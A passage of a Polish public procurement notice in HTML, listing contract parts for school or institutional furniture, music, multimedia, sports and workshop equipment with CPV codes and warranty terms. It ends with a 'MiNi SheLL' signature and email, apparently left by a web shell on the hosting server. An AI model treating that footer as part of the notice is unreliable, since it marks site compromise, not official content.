        widoczne po montażu mebla, łby śrub i wkrętów powinny  być wyposażone w odpowiednie zaślepki o 
       kolorze zbliżonym do koloru płyty.
9)    do montażu drzwi należy zastosować zawiasy puszkowe z regulacją  głębokości oraz siły docisku.
10)  szuflady oraz wysuwki powinny być zaopatrzone  w prowadnice rolkowe.
11)  położenie i odległości pomiędzy półkami powinno być dostosowane do znormalizowanych wymiarów 
       artykułów biurowych ( segregatory, skoroszyty). 
12)  stelaż metalowy powinien być malowany farbą proszkową
13)  na życzenie Zamawiającego należy wykonać otwory w blacie biurek na przewody komputerowe.
1.4.  Wykonawca  udzieli co najmniej  12 miesięcznej   gwarancji na dostarczony towar..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.12.00.00-9, 39.16.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 25.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> zakup, dostawa i montaż mebli - wyposażenie pozostałe.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zakres przedmiotu zamówienia dla zadania II - zakup, dostawa i montaż mebli - wyposażenie
         pozostałe:
1)      dywan- wymiary 160x230 cm -4 szt,
2)     kanapa 2-osobowa z funkcją spania dł 134 x szer 90 x wys 85 -4 szt,
3)     zestaw mebli kuchennych - 1 kpl.  wykonane w kolorze buk , z płyty wiórowej laminowanej .
1.1. Szczegółowy opis dla zadania I zawarty jest w załączniku 5.2. do SIWZ.
1.2. Zakup, koszty transportu oraz montaż w całości ponosi Wykonawca.
1.3.  Wykonawca  udzieli co najmniej  12 miesięcznej   gwarancji na dostarczony towar.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.14.10.00-2, 39.14.31.10-0, 39.53.10.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 25.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> zakup, dostawa i montaż sprzęt drobny (pozostałe).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zakres przedmiotu zamówienia dla zadania III - zakup, dostawa i montaż sprzęt drobny
          (pozostałe):
1)      suszarki na kółkach do prac plastycznych ( 15 prac)- 2 szt,
2)      ławka szatniowa z wieszakami dla 12 osób - 4 szt,
3)      tablica ogłoszeniowa ( 1215x915) - 24 szt,
4)      gabloty informacyjne aluminiowe szer.1200 x gł.900- 4 szt,
5)      godło państwowe o wymiarach wys.420x szer 350 mm- 20 szt,
6)      kosz na śmieci metalowy - 20 szt,
7)      sztalugi regulowane - 4 szt.
1.1. Szczegółowy opis dla zadania I zawarty jest w załączniku 5.3. do SIWZ.
1.2.  Wykonawca  udzieli co najmniej  24 miesięcznej   gwarancji na dostarczony towar.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.15.00.00-8, 30.19.21.70-3, 39.22.43.40-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 25.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> zakup i dostawa sprzętu muzycznego.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zakres przedmiotu zamówienia dla zadania IV - zakup i dostawa sprzętu muzycznego:
1)     mikrofon bezprzewodowy nagłowny - 1 szt,
2)     wibrafon -1 szt,
3)     misy tybetańskie z mieszanki metali :
-       1x 300g -1 szt,
-       2x500g -1 szt,
-       1x700g - 1 szt,
-       pałki     - 1 szt,
4) statyw do instrumentów perkusyjnych - 1 szt,
5) gitara - 1 szt.
1.1. Szczegółowy opis dla zadania I zawarty jest w załączniku 5.4. do SIWZ.
1.2. Zakup, koszty transportu oraz montaż w całości ponosi Wykonawca.
1.3.  Wykonawca  udzieli co najmniej  24 miesięcznej   gwarancji na dostarczony towar.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.32.17.00-1, 37.31.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 25.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> zakup, dostawa  i montaż sprzętu RTV i multimedialnego.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zakres przedmiotu zamówienia dla zadania V - zakup, dostawa  i montaż sprzętu RTV 
        i multimedialnego:
1)     telewizor plazmowy 32 cala- 1 szt,
2)     odtwarzacz DVD-4 szt,
3)     radiomagnetofon - 6 szt,
4)     zestaw multimedialny - 1 kpl:
-       projektor,
-       ekran,
-       laptop,
1.1. Szczegółowy opis dla zadania I zawarty jest w załączniku 5.5. do SIWZ.
1.2.  Wykonawca  udzieli co najmniej  24 miesięcznej   gwarancji na dostarczony towar.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.32.20.00-6, 32.32.00.00-2, 30.21.31.00-6, 38.65.34.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 25.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> zakup, dostawa  i montaż sprzętu rehabilitacyjnego i sportowego.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zakres przedmiotu zamówienia dla zadania VI - zakup, dostawa  i montaż sprzętu
        rehabilitacyjnego i sportowego:
1)     basen rehabilitacyjny ( 200x200)  - 1 szt,
2)     poducha grucha 400l -6 szt,
3)     drabinki gimnastyczne podwójne  - 2 szt,
4)     ławeczki gimnastyczne dł. 3,5 m - 2 szt,
5)     kosz na piłki metalowy zamykany - 1 szt,
6)    stół tenisowy składany- 1 szt,
7)    stojaki i siatka do siatkówki- 1 kpl,
8)    kule lekkoatletyczne 4 kg - 2 szt  i 3 kg - 6 szt,
9)    oszczepy 600 gr- 4 szt,
10)   bloki startowe ( aluminiowe)- 2 szt,
11)   zestaw do unihokeja - 1 kpl,
12)  piłki lekarskie skóra 2 kg- 8 szt i 1 kg-10 szt,
13)  lina do pociągania 10m śr 25 mm - 10 szt,
14)  karimaty- 10 szt,
15) ergonometr wioślarski ( trenażer) R 301- 1 szt,
16) bieżnia T 103- 1 szt,
17)  wielofunkcyjne  urządzenie do ćwiczeń- 1szt,
18)  wykładzina gimnastyczna -filc gr 20 mm , dł 8 m, szer. 2m- 1 szt.
1.1. Szczegółowy opis dla zadania I zawarty jest w załączniku 5.6. do SIWZ.
1.2.  Wykonawca  udzieli co najmniej  24 miesięcznej   gwarancji na dostarczony towar...</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.40.00.00-2, 37.41.50.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 25.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> zakup, dostawa  i montaż wyposażenia magazynowego-warsztatowego.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zakres przedmiotu zamówienia dla zadania VII - zakup, dostawa  i montaż wyposażenia
        magazynowego-warsztatowego: 
1)     regał magazynowy-uniwersalny, ocynkowany- 6 szt,
2)     szafki ubraniowe metalowe o wymiarach wys.1840x szer.1200x gł 500 -12 szt,
3)     stół warsztatowy ślusarsko-stolarski 25x25x1,5 mm  - 6 szt,
4)     ławki na korytarze  - 6 szt,
1.1. Szczegółowy opis dla zadania I zawarty jest w załączniku 5.7. do SIWZ.
1.2. Wykonawca  udzieli co najmniej  24 miesięcznej   gwarancji na dostarczony towar..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.14.11.00-3, 39.15.12.00-7, 39.13.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 25.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com